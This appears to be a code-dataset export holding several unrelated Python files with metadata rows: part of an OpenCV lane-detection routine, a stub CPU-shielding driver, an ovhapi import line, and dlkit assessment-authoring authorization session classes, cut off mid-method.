        line_arr = line_arr1
        slope_degree = slope_degree1
    elif line_arr1.shape[0]==0 and line_arr2.shape[0]!=0:
        line_arr = line_arr2
        slope_degree = slope_degree2
    else:
        line_arr = line_arr[np.abs(slope_degree) < 160]
        slope_degree = slope_degree[np.abs(slope_degree) < 160]
        line_arr = line_arr[np.abs(slope_degree) >30]
        slope_degree = slope_degree[np.abs(slope_degree)>30]
    # Positive angles -> left side, negative -> right side.
    L_lines, R_lines = line_arr[(slope_degree > 0), :], line_arr[(slope_degree < 0), :]
    if L_lines.shape[0]!=0 and R_lines.shape[0]==0:
        # Right lane missing: retry Hough on the bottom-left fifth of the
        # frame and substitute a synthetic vertical right edge.
        vertices = np.array([[(0, height), (0, height * 4 / 5), (weight/2, height * 4 / 5), (weight/2, height)]],
                            dtype=np.int32)
        ROI_img = ROI(canny_img, vertices)
        line_arr = cv2.HoughLinesP(ROI_img, 1, np.pi / 180, 50, minLineLength=10, maxLineGap=50)
        if type(line_arr).__name__ == 'NoneType':
            line_arr = line
        elif line_arr.shape[0] != 1:
            line_arr = np.squeeze(line_arr)
            line = line_arr
        elif line_arr.shape[0] == 1:
            line_arr = np.squeeze(line_arr, axis=1)
            line = line_arr
        slope_degree = (np.arctan2(line_arr[:, 1] - line_arr[:, 3], line_arr[:, 0] - line_arr[:, 2]) * 180) / np.pi
        line_arr1, line_arr2, slope_degree1, slope_degree2 = line_arr, line_arr, slope_degree, slope_degree
        line_arr1 = line_arr1[np.abs(slope_degree1) < 160]
        slope_degree1 = slope_degree1[np.abs(slope_degree1) < 160]
        line_arr1 = line_arr1[np.abs(slope_degree1) > 90]
        slope_degree1 = slope_degree1[np.abs(slope_degree1) > 90]
        line_arr2 = line_arr2[np.abs(slope_degree2) > 30]
        slope_degree2 = slope_degree2[np.abs(slope_degree2) > 30]
        line_arr2 = line_arr2[np.abs(slope_degree2) < 90]
        slope_degree2 = slope_degree2[np.abs(slope_degree2) < 90]
        if line_arr1.shape[0] != 0 and line_arr2.shape[0] != 0:
            # NOTE(review): same line_arr1-twice concatenation as above.
            line_arr = np.concatenate((line_arr1, line_arr1), axis=0)
            slope_degree = np.concatenate((slope_degree2, slope_degree1), axis=0)
        elif line_arr1.shape[0] != 0 and line_arr2.shape[0] == 0:
            line_arr = line_arr1
            slope_degree = slope_degree1
        elif line_arr1.shape[0] == 0 and line_arr2.shape[0] != 0:
            line_arr = line_arr2
            slope_degree = slope_degree2
        else:
            line_arr = line_arr[np.abs(slope_degree) < 160]
            slope_degree = slope_degree[np.abs(slope_degree) < 160]
            line_arr = line_arr[np.abs(slope_degree) > 30]
            slope_degree = slope_degree[np.abs(slope_degree) > 30]
        # Synthetic right edge along the right border of the frame.
        L_lines, R_lines = line_arr[(slope_degree > 0), :], np.array([[weight,height, weight, height*0.7]])
    elif L_lines.shape[0]==0 and R_lines.shape[0]!=0:
        # Left lane missing: mirror of the branch above on the bottom-right
        # fifth of the frame, with a synthetic vertical left edge.
        vertices = np.array([[(weight/2, height), (weight/2, height * 4 / 5), (weight, height * 4 / 5), (weight, height)]],
                            dtype=np.int32)
        ROI_img = ROI(canny_img, vertices)
        line_arr = cv2.HoughLinesP(ROI_img, 1, np.pi / 180, 50, minLineLength=10, maxLineGap=50)
        if type(line_arr).__name__ == 'NoneType':
            line_arr = line
        elif line_arr.shape[0] != 1:
            line_arr = np.squeeze(line_arr)
            line = line_arr
        elif line_arr.shape[0] == 1:
            line_arr = np.squeeze(line_arr, axis=1)
            line = line_arr
        slope_degree = (np.arctan2(line_arr[:, 1] - line_arr[:, 3], line_arr[:, 0] - line_arr[:, 2]) * 180) / np.pi
        line_arr1, line_arr2, slope_degree1, slope_degree2 = line_arr, line_arr, slope_degree, slope_degree
        line_arr1 = line_arr1[np.abs(slope_degree1) < 160]
        slope_degree1 = slope_degree1[np.abs(slope_degree1) < 160]
        line_arr1 = line_arr1[np.abs(slope_degree1) > 90]
        slope_degree1 = slope_degree1[np.abs(slope_degree1) > 90]
        line_arr2 = line_arr2[np.abs(slope_degree2) > 30]
        slope_degree2 = slope_degree2[np.abs(slope_degree2) > 30]
        line_arr2 = line_arr2[np.abs(slope_degree2) < 90]
        slope_degree2 = slope_degree2[np.abs(slope_degree2) < 90]
        if line_arr1.shape[0] != 0 and line_arr2.shape[0] != 0:
            # NOTE(review): same line_arr1-twice concatenation as above.
            line_arr = np.concatenate((line_arr1, line_arr1), axis=0)
            slope_degree = np.concatenate((slope_degree2, slope_degree1), axis=0)
        elif line_arr1.shape[0] != 0 and line_arr2.shape[0] == 0:
            line_arr = line_arr1
            slope_degree = slope_degree1
        elif line_arr1.shape[0] == 0 and line_arr2.shape[0] != 0:
            line_arr = line_arr2
            slope_degree = slope_degree2
        else:
            line_arr = line_arr[np.abs(slope_degree) < 160]
            slope_degree = slope_degree[np.abs(slope_degree) < 160]
            line_arr = line_arr[np.abs(slope_degree) > 30]
            slope_degree = slope_degree[np.abs(slope_degree) > 30]
        L_lines, R_lines = np.array([[0, height, 0, height*0.7]]), line_arr[(slope_degree < 0), :]
    # Fit one line per side, draw both onto img, and blend with an (all-zero)
    # overlay; temp is black so addWeighted leaves img visually unchanged.
    temp = np.zeros((img.shape[0], img.shape[1], 3), dtype=np.uint8)
    left_fit_line = get_fitline_left(img, L_lines)
    right_fit_line = get_fitline_right(img, R_lines)
    draw(img, right_fit_line[:4])
    draw(img, left_fit_line[:4])
    result = cv2.addWeighted(img, 1, temp, 1, 0)
    return result, left_fit_line[:4], right_fit_line[:4]
| 40.370213
| 123
| 0.599346
| 1,476
| 9,487
| 3.636179
| 0.082656
| 0.099124
| 0.067077
| 0.03801
| 0.828582
| 0.789827
| 0.772312
| 0.7643
| 0.749022
| 0.749022
| 0
| 0.090652
| 0.254664
| 9,487
| 234
| 124
| 40.542735
| 0.668364
| 0.034679
| 0
| 0.712644
| 0
| 0
| 0.002624
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.028736
| false
| 0
| 0.017241
| 0
| 0.068966
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ffb3512d151b9fcc9a8285a364d3a620ade63ebb
| 180
|
py
|
Python
|
akeydo/plugins/cpu/drivers/cgroup.py
|
dangle/vfio-kvm
|
13ed6f6b2ebbc2e23afe267866e321a2fd51a337
|
[
"MIT"
] | 30
|
2021-01-15T18:22:26.000Z
|
2021-06-02T14:10:40.000Z
|
akeydo/plugins/cpu/drivers/cgroup.py
|
dangle/vfio-kvm
|
13ed6f6b2ebbc2e23afe267866e321a2fd51a337
|
[
"MIT"
] | 11
|
2021-01-23T05:37:06.000Z
|
2021-04-21T21:50:37.000Z
|
akeydo/plugins/cpu/drivers/cgroup.py
|
dangle/vfio-kvm
|
13ed6f6b2ebbc2e23afe267866e321a2fd51a337
|
[
"MIT"
] | null | null | null |
class Driver:
    """Base CPU-shielding driver: records the core count and accepts
    shield/unshield requests as no-ops (subclasses implement the work)."""

    def __init__(self, cores: int) -> None:
        # Core count is stored for subclasses; the base class never reads it.
        self._cores = cores

    def shield_cpu(self, *cpu):
        """Shield the given CPUs.  Base implementation does nothing."""

    def unshield_cpu(self, *cpu):
        """Unshield the given CPUs.  Base implementation does nothing."""
| 18
| 43
| 0.572222
| 23
| 180
| 4.173913
| 0.521739
| 0.1875
| 0.208333
| 0.291667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.316667
| 180
| 9
| 44
| 20
| 0.780488
| 0
| 0
| 0.285714
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.428571
| false
| 0.285714
| 0
| 0
| 0.571429
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
| 0
|
0
| 7
|
4420e9ac062cb8a20b6cb977ff7557e2369ab33e
| 47
|
py
|
Python
|
ovhapi/__init__.py
|
surycat/ovhapi
|
a8b36acbbdafe7137817f2175a27553b6f212f00
|
[
"BSD-3-Clause"
] | 1
|
2020-08-17T18:02:15.000Z
|
2020-08-17T18:02:15.000Z
|
ovhapi/__init__.py
|
surycat/ovhapi
|
a8b36acbbdafe7137817f2175a27553b6f212f00
|
[
"BSD-3-Clause"
] | null | null | null |
ovhapi/__init__.py
|
surycat/ovhapi
|
a8b36acbbdafe7137817f2175a27553b6f212f00
|
[
"BSD-3-Clause"
] | null | null | null |
from OvhApi import Api, OVH_API_EU, OVH_API_CA
| 23.5
| 46
| 0.829787
| 10
| 47
| 3.5
| 0.7
| 0.342857
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.12766
| 47
| 1
| 47
| 47
| 0.853659
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
4443e3310beae2eb4700f021259257a31ad32846
| 117,410
|
py
|
Python
|
dlkit/authz_adapter/assessment_authoring/sessions.py
|
UOC/dlkit
|
a9d265db67e81b9e0f405457464e762e2c03f769
|
[
"MIT"
] | 2
|
2018-02-23T12:16:11.000Z
|
2020-10-08T17:54:24.000Z
|
dlkit/authz_adapter/assessment_authoring/sessions.py
|
UOC/dlkit
|
a9d265db67e81b9e0f405457464e762e2c03f769
|
[
"MIT"
] | 87
|
2017-04-21T18:57:15.000Z
|
2021-12-13T19:43:57.000Z
|
dlkit/authz_adapter/assessment_authoring/sessions.py
|
UOC/dlkit
|
a9d265db67e81b9e0f405457464e762e2c03f769
|
[
"MIT"
] | 1
|
2018-03-01T16:44:25.000Z
|
2018-03-01T16:44:25.000Z
|
"""AuthZ Adapter implementations of assessment.authoring sessions."""
# pylint: disable=no-init
# Numerous classes don't require __init__.
# pylint: disable=too-many-public-methods
# Number of methods are defined in specification
# pylint: disable=too-many-ancestors
# Inheritance defined in specification
from ..osid import sessions as osid_sessions
from ..osid.osid_errors import NotFound
from ..osid.osid_errors import PermissionDenied, NullArgument, Unimplemented
from ..osid.osid_errors import Unsupported
from ..primitives import Id
from ..utilities import QueryWrapper
from ..utilities import raise_null_argument
from dlkit.abstract_osid.assessment_authoring import sessions as abc_assessment_authoring_sessions
class AssessmentPartLookupSession(abc_assessment_authoring_sessions.AssessmentPartLookupSession, osid_sessions.OsidSession):
    """Adapts underlying AssessmentPartLookupSession methods with authorization checks."""

    def __init__(self, *args, **kwargs):
        osid_sessions.OsidSession.__init__(self, *args, **kwargs)
        # Authorization qualifier: the bank this session is scoped to.
        self._qualifier_id = self._provider_session.get_bank_id()
        self._id_namespace = 'assessment_authoring.AssessmentPart'
        self.use_federated_bank_view()
        self.use_comparative_assessment_part_view()
        # Caches for (un)authorized bank ids, filled lazily.
        self._auth_bank_ids = None
        self._unauth_bank_ids = None
    #     self._overriding_bank_ids = None
    #
    # def _get_overriding_bank_ids(self):
    #     if self._overriding_bank_ids is None:
    #         self._overriding_bank_ids = self._get_overriding_catalog_ids('lookup')
    #     return self._overriding_bank_ids

    def _try_overriding_banks(self, query):
        """Restrict *query* to banks with overriding 'lookup' authorization
        and execute it; returns ``(results, query)``."""
        if self._get_overriding_catalog_ids('lookup') is not None:
            for catalog_id in self._get_overriding_catalog_ids('lookup'):
                query.match_bank_id(catalog_id, match=True)
        return self._query_session.get_assessment_parts_by_query(query), query

    def _get_unauth_bank_ids(self, bank_id):
        """Recursively collect ids of *bank_id* and its children for which
        the user lacks 'lookup' authorization."""
        if self._can('lookup', bank_id):
            return []  # Don't go further - assumes authorizations inherited
        else:
            unauth_list = [str(bank_id)]
            if self._hierarchy_session.has_child_banks(bank_id):
                for child_bank_id in self._hierarchy_session.get_child_bank_ids(bank_id):
                    unauth_list = unauth_list + self._get_unauth_bank_ids(child_bank_id)
            return unauth_list

    def _try_harder(self, query):
        """Re-run *query* excluding unauthorized banks; used as the fallback
        when a direct 'lookup' authorization check fails."""
        results, query = self._try_overriding_banks(query)
        if self._is_isolated_catalog_view():
            if results.available() or self._is_comparative_object_view():
                return results
        if self._is_plenary_object_view():
            return results
        if self._hierarchy_session is None or self._query_session is None:
            return results
        if self._unauth_bank_ids is None:
            self._unauth_bank_ids = self._get_unauth_bank_ids(self._qualifier_id)
        for bank_id in self._unauth_bank_ids:
            query.match_bank_id(bank_id, match=False)
        return self._query_session.get_assessment_parts_by_query(query)

    def get_bank_id(self):
        # Implemented from azosid template for -
        # osid.resource.ResourceLookupSession.get_bin_id_template
        return self._provider_session.get_bank_id()

    bank_id = property(fget=get_bank_id)

    def get_bank(self):
        # Implemented from azosid template for -
        # osid.resource.ResourceLookupSession.get_bin_template
        if not self._can('lookup'):
            raise PermissionDenied()
        else:
            return self._provider_session.get_bank()

    bank = property(fget=get_bank)

    def can_lookup_assessment_parts(self):
        # Implemented from azosid template for -
        # osid.resource.ResourceLookupSession.can_lookup_resources_template
        return (self._can('lookup') or
                bool(self._get_overriding_catalog_ids('lookup')))

    def use_comparative_assessment_part_view(self):
        # Implemented from azosid template for -
        # osid.resource.ResourceLookupSession.use_comparative_resource_view_template
        self._use_comparative_object_view()
        self._provider_session.use_comparative_assessment_part_view()

    def use_plenary_assessment_part_view(self):
        # Implemented from azosid template for -
        # osid.resource.ResourceLookupSession.use_plenary_resource_view_template
        self._use_plenary_object_view()
        self._provider_session.use_plenary_assessment_part_view()

    def use_federated_bank_view(self):
        # Implemented from azosid template for -
        # osid.resource.ResourceLookupSession.use_federated_bin_view_template
        self._use_federated_catalog_view()
        self._provider_session.use_federated_bank_view()
        if self._query_session:
            self._query_session.use_federated_bank_view()

    def use_isolated_bank_view(self):
        # Implemented from azosid template for -
        # osid.resource.ResourceLookupSession.use_isolated_bin_view_template
        self._use_isolated_catalog_view()
        self._provider_session.use_isolated_bank_view()
        if self._query_session:
            self._query_session.use_isolated_bank_view()

    def use_active_assessment_part_view(self):
        # Implemented from azosid template for -
        # osid.composition.CompositionLookupSession.use_active_composition_view
        return self._provider_session.use_active_assessment_part_view()

    def use_any_status_assessment_part_view(self):
        # Implemented from azosid template for -
        # osid.composition.CompositionLookupSession.use_any_status_composition_view
        return self._provider_session.use_any_status_assessment_part_view()

    def use_sequestered_assessment_part_view(self):
        # Implemented from azosid template for -
        # osid.composition.CompositionLookupSession.use_sequestered_composition_view_template
        return self._provider_session.use_sequestered_assessment_part_view()

    def use_unsequestered_assessment_part_view(self):
        # Implemented from azosid template for -
        # osid.composition.CompositionLookupSession.use_unsequestered_composition_view_template
        return self._provider_session.use_unsequestered_assessment_part_view()

    @raise_null_argument
    def get_assessment_part(self, assessment_part_id):
        # Implemented from azosid template for -
        # osid.resource.ResourceLookupSession.get_resource_template
        if self._can('lookup'):
            return self._provider_session.get_assessment_part(assessment_part_id)
        self._check_lookup_conditions()  # raises PermissionDenied
        query = self._query_session.get_assessment_part_query()
        query.match_id(assessment_part_id, match=True)
        results = self._try_harder(query)
        if results.available():
            return results.next()
        raise NotFound()

    @raise_null_argument
    def get_assessment_parts_by_ids(self, assessment_part_ids):
        # Implemented from azosid template for -
        # osid.resource.ResourceLookupSession.get_resources_by_ids_template
        if self._can('lookup'):
            return self._provider_session.get_assessment_parts_by_ids(assessment_part_ids)
        self._check_lookup_conditions()  # raises PermissionDenied
        query = self._query_session.get_assessment_part_query()
        for assessment_part_id in (assessment_part_ids):
            query.match_id(assessment_part_id, match=True)
        return self._try_harder(query)

    @raise_null_argument
    def get_assessment_parts_by_genus_type(self, assessment_part_genus_type):
        # Implemented from azosid template for -
        # osid.resource.ResourceLookupSession.get_resources_by_genus_type_template
        if self._can('lookup'):
            return self._provider_session.get_assessment_parts_by_genus_type(assessment_part_genus_type)
        self._check_lookup_conditions()  # raises PermissionDenied
        query = self._query_session.get_assessment_part_query()
        query.match_genus_type(assessment_part_genus_type, match=True)
        return self._try_harder(query)

    @raise_null_argument
    def get_assessment_parts_by_parent_genus_type(self, assessment_genus_type):
        # Implemented from azosid template for -
        # osid.resource.ResourceLookupSession.get_resources_by_parent_genus_type_template
        if self._can('lookup'):
            return self._provider_session.get_assessment_parts_by_parent_genus_type(assessment_genus_type)
        self._check_lookup_conditions()  # raises PermissionDenied
        query = self._query_session.get_assessment_part_query()
        query.match_parent_genus_type(assessment_genus_type, match=True)
        return self._try_harder(query)

    @raise_null_argument
    def get_assessment_parts_by_record_type(self, assessment_part_record_type):
        # Implemented from azosid template for -
        # osid.resource.ResourceLookupSession.get_resources_by_record_type_template
        if self._can('lookup'):
            return self._provider_session.get_assessment_parts_by_record_type(assessment_part_record_type)
        self._check_lookup_conditions()  # raises PermissionDenied
        query = self._query_session.get_assessment_part_query()
        query.match_record_type(assessment_part_record_type, match=True)
        return self._try_harder(query)

    @raise_null_argument
    def get_assessment_parts_for_assessment(self, assessment_id):
        # Implemented from azosid template for -
        # osid.learning.ActivityLookupSession.get_activities_for_objective_template
        if self._can('lookup'):
            return self._provider_session.get_assessment_parts_for_assessment(assessment_id)
        self._check_lookup_conditions()  # raises PermissionDenied
        query = self._query_session.get_assessment_part_query()
        query.match_assessment_id(assessment_id, match=True)
        return self._try_harder(query)

    def get_assessment_parts(self):
        # Implemented from azosid template for -
        # osid.resource.ResourceLookupSession.get_resources_template
        if self._can('lookup'):
            return self._provider_session.get_assessment_parts()
        self._check_lookup_conditions()  # raises PermissionDenied
        query = self._query_session.get_assessment_part_query()
        query.match_any(match=True)
        return self._try_harder(query)

    assessment_parts = property(fget=get_assessment_parts)

    def get_assessment_parts_for_assessment_part(self, assessment_part_id):
        # NOT CURRENTLY IN SPEC - Implemented from
        # osid.assessment_authoring.AssessmentPartLookupSession.additional_methods
        if self._can('lookup'):
            return self._provider_session.get_assessment_parts_for_assessment_part(assessment_part_id)
        self._check_lookup_conditions()  # raises PermissionDenied
        query = self._query_session.get_assessment_part_query()
        query.match_assessment_part_id(assessment_part_id, match=True)
        return self._try_harder(query)
class AssessmentPartQuerySession(abc_assessment_authoring_sessions.AssessmentPartQuerySession, osid_sessions.OsidSession):
    """Adapts underlying AssessmentPartQuerySession methods with authorization checks.

    Queries are vetted against the agent's 'search' authorization. Bank
    matching on queries handed out by this session is deferred (see the
    nested AssessmentPartQueryWrapper) so the matches can be authorization-
    checked in get_assessment_parts_by_query before being applied.
    """
    def __init__(self, *args, **kwargs):
        osid_sessions.OsidSession.__init__(self, *args, **kwargs)
        # The bound bank is the qualifier for session-wide authorization checks.
        self._qualifier_id = self._provider_session.get_bank_id()
        self._id_namespace = 'assessment_authoring.AssessmentPart'
        self.use_federated_bank_view()
        # Lazily-computed cache of bank ids the agent may NOT search.
        self._unauth_bank_ids = None
        # self._overriding_bank_ids = None
    # def _get_overriding_bank_ids(self):
    #     if self._overriding_bank_ids is None:
    #         self._overriding_bank_ids = self._get_overriding_catalog_ids('search')
    #     return self._overriding_bank_ids
    def _try_overriding_banks(self, query):
        """Match every bank with an overriding 'search' authorization into the query, then run it."""
        if self._get_overriding_catalog_ids('search') is not None:
            for bank_id in self._get_overriding_catalog_ids('search'):
                query._provider_query.match_bank_id(bank_id, match=True)
        return self._query_session.get_assessment_parts_by_query(query), query
    def _get_unauth_bank_ids(self, bank_id):
        """Recursively collect ids of banks (from bank_id down) the agent cannot search."""
        if self._can('search', bank_id):
            return []  # Don't go further - assumes authorizations inherited
        else:
            unauth_list = [str(bank_id)]
            if self._hierarchy_session.has_child_banks(bank_id):
                for child_bank_id in self._hierarchy_session.get_child_bank_ids(bank_id):
                    unauth_list = unauth_list + self._get_unauth_bank_ids(child_bank_id)
            return unauth_list
    def _try_harder(self, query):
        """Run the query against overriding banks, then widen by excluding unauthorized banks."""
        results, query = self._try_overriding_banks(query)
        if self._is_isolated_catalog_view():
            # Isolated view: only results from overriding banks may be returned.
            if results.available():
                return results
        if self._hierarchy_session is None or self._query_session is None:
            # Cannot widen without hierarchy/query support; settle for what we have.
            return results
        if self._unauth_bank_ids is None:
            self._unauth_bank_ids = self._get_unauth_bank_ids(self._qualifier_id)
        for bank_id in self._unauth_bank_ids:
            query._provider_query.match_bank_id(bank_id, match=False)
        return self._query_session.get_assessment_parts_by_query(query)
    class AssessmentPartQueryWrapper(QueryWrapper):
        """Wrapper for AssessmentPartQueries to override match_bank_id method"""
        def match_bank_id(self, bank_id, match=True):
            # Defer the bank match: record the arguments so that
            # get_assessment_parts_by_query can authorization-check each one
            # before applying it to the underlying provider query.
            self._cat_id_args_list.append({'bank_id': bank_id, 'match': match})
    def get_bank_id(self):
        """Return the ``Id`` of the bank this session is bound to."""
        # Implemented from azosid template for -
        # osid.resource.ResourceLookupSession.get_bin_id_template
        return self._provider_session.get_bank_id()
    bank_id = property(fget=get_bank_id)
    def get_bank(self):
        """Return the bank, provided the agent holds the 'lookup' authorization."""
        # Implemented from azosid template for -
        # osid.resource.ResourceLookupSession.get_bin_template
        if not self._can('lookup'):
            raise PermissionDenied()
        else:
            return self._provider_session.get_bank()
    bank = property(fget=get_bank)
    def can_search_assessment_parts(self):
        # Implemented from azosid template for -
        # osid.resource.ResourceQuerySession.can_search_resources_template
        # True with a blanket 'search' authorization or any overriding catalog.
        return (self._can('search') or
                bool(self._get_overriding_catalog_ids('search')))
    def use_federated_bank_view(self):
        # Implemented from azosid template for -
        # osid.resource.ResourceLookupSession.use_federated_bin_view_template
        # Set the view locally, then mirror it on provider and query sessions.
        self._use_federated_catalog_view()
        self._provider_session.use_federated_bank_view()
        if self._query_session:
            self._query_session.use_federated_bank_view()
    def use_isolated_bank_view(self):
        # Implemented from azosid template for -
        # osid.resource.ResourceLookupSession.use_isolated_bin_view_template
        # Set the view locally, then mirror it on provider and query sessions.
        self._use_isolated_catalog_view()
        self._provider_session.use_isolated_bank_view()
        if self._query_session:
            self._query_session.use_isolated_bank_view()
    def use_sequestered_assessment_part_view(self):
        # Implemented from azosid template for -
        # osid.composition.CompositionLookupSession.use_sequestered_composition_view_template
        # Straight pass-through; no local view state is tracked for this.
        return self._provider_session.use_sequestered_assessment_part_view()
    def use_unsequestered_assessment_part_view(self):
        # Implemented from azosid template for -
        # osid.composition.CompositionLookupSession.use_unsequestered_composition_view_template
        # Straight pass-through; no local view state is tracked for this.
        return self._provider_session.use_unsequestered_assessment_part_view()
    def get_assessment_part_query(self):
        """Return a wrapped query whose bank matches are deferred for auth vetting."""
        # Implemented from azosid template for -
        # osid.resource.ResourceQuerySession.get_resource_query_template
        if (not self._can('search') and
                self._is_isolated_catalog_view()):
            raise PermissionDenied()
        else:
            return self.AssessmentPartQueryWrapper(self._provider_session.get_assessment_part_query())
    assessment_part_query = property(fget=get_assessment_part_query)
    @raise_null_argument
    def get_assessment_parts_by_query(self, assessment_part_query):
        """Execute a query from this session, applying only authorized bank matches."""
        # Implemented from azosid template for -
        # osid.resource.ResourceQuerySession.get_resources_by_query_template
        if not hasattr(assessment_part_query, '_cat_id_args_list'):
            # Only queries produced by get_assessment_part_query carry the
            # deferred bank-match list; anything else cannot be vetted.
            raise Unsupported('assessment_part_query not from this session')
        for kwargs in assessment_part_query._cat_id_args_list:
            if self._can('search', kwargs['bank_id']):
                assessment_part_query._provider_query.match_bank_id(**kwargs)
        if self._can('search'):
            return self._provider_session.get_assessment_parts_by_query(assessment_part_query)
        self._check_search_conditions()
        result = self._try_harder(assessment_part_query)
        # Clear the bank terms added by _try_harder so the query can be reused.
        assessment_part_query._provider_query.clear_bank_terms()
        return result
class AssessmentPartSearchSession(abc_assessment_authoring_sessions.AssessmentPartSearchSession, AssessmentPartQuerySession):
    """Adapts underlying AssessmentPartSearchSession methods with authorization checks."""
    def get_assessment_part_search(self):
        """Pass through to provider AssessmentPartSearchSession.get_assessment_part_search"""
        # Implemented from azosid template for -
        # osid.resource.ResourceSearchSession.get_resource_search_template
        if self._can('search'):
            return self._provider_session.get_assessment_part_search()
        raise PermissionDenied()
    assessment_part_search = property(fget=get_assessment_part_search)
    def get_assessment_part_search_order(self):
        # Search orders are not supported by this authorization adapter.
        raise Unimplemented()
    assessment_part_search_order = property(fget=get_assessment_part_search_order)
    @raise_null_argument
    def get_assessment_parts_by_search(self, assessment_part_query, assessment_part_search):
        """Pass through to provider AssessmentPartSearchSession.get_assessment_parts_by_search"""
        # Implemented from azosid template for -
        # osid.resource.ResourceSearchSession.get_resources_by_search_template
        if self._can('search'):
            return self._provider_session.get_assessment_parts_by_search(assessment_part_query, assessment_part_search)
        raise PermissionDenied()
    @raise_null_argument
    def get_assessment_part_query_from_inspector(self, assessment_part_query_inspector):
        # Query inspectors are not supported by this authorization adapter.
        raise Unimplemented()
class AssessmentPartAdminSession(abc_assessment_authoring_sessions.AssessmentPartAdminSession, osid_sessions.OsidSession):
    """Adapts underlying AssessmentPartAdminSession methods with authorization checks.

    Create/update/delete/alias calls are vetted against the corresponding
    authorization function; object-level checks consult the bank(s) an
    assessment part is mapped to.
    """
    def __init__(self, provider_manager, *args, **kwargs):
        osid_sessions.OsidSession.__init__(self, *args, **kwargs)
        # The bound bank is the qualifier for session-wide authorization checks.
        self._qualifier_id = self._provider_session.get_bank_id()
        self._id_namespace = 'assessment_authoring.AssessmentPart'
        self._overriding_bank_ids = None
        if self._proxy is not None:
            try:
                self._object_catalog_session = provider_manager.get_assessment_part_bank_session(self._proxy)
            except (Unimplemented, AttributeError):
                # Best-effort: object-level catalog checks degrade gracefully.
                pass
        else:
            try:
                self._object_catalog_session = provider_manager.get_assessment_part_bank_session()
                # NOTE(review): only this non-proxy branch aliases
                # get_bank_ids_by_assessment_part — confirm the proxy branch
                # should not do the same.
                self.get_bank_ids_by_assessment_part = self._object_catalog_session.get_bank_ids_by_assessment_part
            except (Unimplemented, AttributeError):
                pass
    def _get_overriding_bank_ids(self):
        # Cache the ids of banks carrying overriding 'lookup' authorizations.
        if self._overriding_bank_ids is None:
            self._overriding_bank_ids = self._get_overriding_catalog_ids('lookup')
        return self._overriding_bank_ids
    def _can_for_assessment_part(self, func_name, assessment_part_id):
        """Checks if agent can perform function for object"""
        # NOTE(review): passes 'get_bank_ids_for_assessment_part' while
        # __init__ aliases get_bank_ids_by_assessment_part — confirm which
        # name _can_for_object actually resolves.
        return self._can_for_object(func_name, assessment_part_id, 'get_bank_ids_for_assessment_part')
    def get_bank_id(self):
        """Return the ``Id`` of the bank this session is bound to."""
        # Implemented from azosid template for -
        # osid.resource.ResourceLookupSession.get_bin_id_template
        return self._provider_session.get_bank_id()
    bank_id = property(fget=get_bank_id)
    def get_bank(self):
        """Return the bank, provided the agent holds the 'lookup' authorization."""
        # Implemented from azosid template for -
        # osid.resource.ResourceLookupSession.get_bin_template
        if not self._can('lookup'):
            raise PermissionDenied()
        else:
            return self._provider_session.get_bank()
    bank = property(fget=get_bank)
    def can_create_assessment_parts(self):
        # Implemented from azosid template for -
        # osid.resource.ResourceAdminSession.can_create_resources
        return self._can('create')
    @raise_null_argument
    def can_create_assessment_part_with_record_types(self, assessment_part_record_types):
        # Implemented from azosid template for -
        # osid.resource.ResourceAdminSession.can_create_resource_with_record_types
        # This would like to be a real implementation someday:
        if assessment_part_record_types is None:
            raise NullArgument()  # Just 'cause the spec says to :)
        return self._can('create')
    @raise_null_argument
    def get_assessment_part_form_for_create_for_assessment(self, assessment_id, assessment_part_record_types):
        """Return a create form for a part under an assessment (requires 'create')."""
        # Implemented from azosid template for -
        # osid.learning.ActivityAdminSession.get_activity_form_for_create_template
        if not self._can('create'):
            raise PermissionDenied()
        return self._provider_session.get_assessment_part_form_for_create_for_assessment(assessment_id, assessment_part_record_types)
    @raise_null_argument
    def create_assessment_part_for_assessment(self, assessment_part_form):
        """Create an assessment part under an assessment (requires 'create')."""
        # Implemented from azosid template for -
        # osid.resource.ResourceAdminSession.create_resource
        if not self._can('create'):
            raise PermissionDenied()
        return self._provider_session.create_assessment_part_for_assessment(assessment_part_form)
    @raise_null_argument
    def get_assessment_part_form_for_create_for_assessment_part(self, assessment_part_id, assessment_part_record_types):
        """Return a create form for a child part (requires 'create')."""
        # Implemented from azosid template for -
        # osid.learning.ActivityAdminSession.get_activity_form_for_create_template
        if not self._can('create'):
            raise PermissionDenied()
        return self._provider_session.get_assessment_part_form_for_create_for_assessment_part(assessment_part_id, assessment_part_record_types)
    @raise_null_argument
    def create_assessment_part_for_assessment_part(self, assessment_part_form):
        """Create an assessment part under another part (requires 'create')."""
        # Implemented from azosid template for -
        # osid.resource.ResourceAdminSession.create_resource
        if not self._can('create'):
            raise PermissionDenied()
        return self._provider_session.create_assessment_part_for_assessment_part(assessment_part_form)
    def can_update_assessment_parts(self):
        # Implemented from azosid template for -
        # osid.resource.ResourceAdminSession.can_update_resources
        # True with a blanket 'update' authorization or any overriding catalog.
        return (self._can('update') or
                bool(self._get_overriding_catalog_ids('update')))
    @raise_null_argument
    def get_assessment_part_form_for_update(self, assessment_part_id):
        """Return an update form, vetted per-object (requires 'update' for this part)."""
        # Implemented from azosid template for -
        # osid.resource.ResourceAdminSession.get_resource_form_for_update
        if not self._can_for_assessment_part('update', assessment_part_id):
            raise PermissionDenied()
